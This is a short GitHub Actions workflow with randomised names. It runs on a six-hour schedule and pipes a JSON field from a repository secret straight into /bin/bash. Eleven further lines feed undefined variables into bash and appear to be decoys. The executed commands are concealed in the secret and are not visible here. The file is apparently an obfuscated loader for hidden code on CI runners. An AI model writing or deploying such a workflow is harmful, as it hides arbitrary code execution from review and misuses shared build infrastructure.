name: haosiwen19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '56 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: haosiwen19871010
        env:
          gwan87: ${{ secrets.gwan87 }}
        run: |
          echo $gwan87 | jq -r .vat3 | /bin/bash
          echo $elwv858 | jq -r .kj943 | /bin/bash
          echo $ds55 | jq -r .nftu72 | /bin/bash
          echo $jaf12563 | jq -r .f6341 | /bin/bash
          echo $ydau9 | jq -r .oma25805 | /bin/bash
          echo $fya061 | jq -r .jrxbq8396 | /bin/bash
          echo $ut89 | jq -r .unrg74229 | /bin/bash
          echo $qqv1415 | jq -r .utyo96 | /bin/bash
          echo $q850 | jq -r .qy0390 | /bin/bash
          echo $vm64150 | jq -r .nri46 | /bin/bash
          echo $f18982 | jq -r .zz3166 | /bin/bash
          echo $he0 | jq -r .jjz8 | /bin/bash

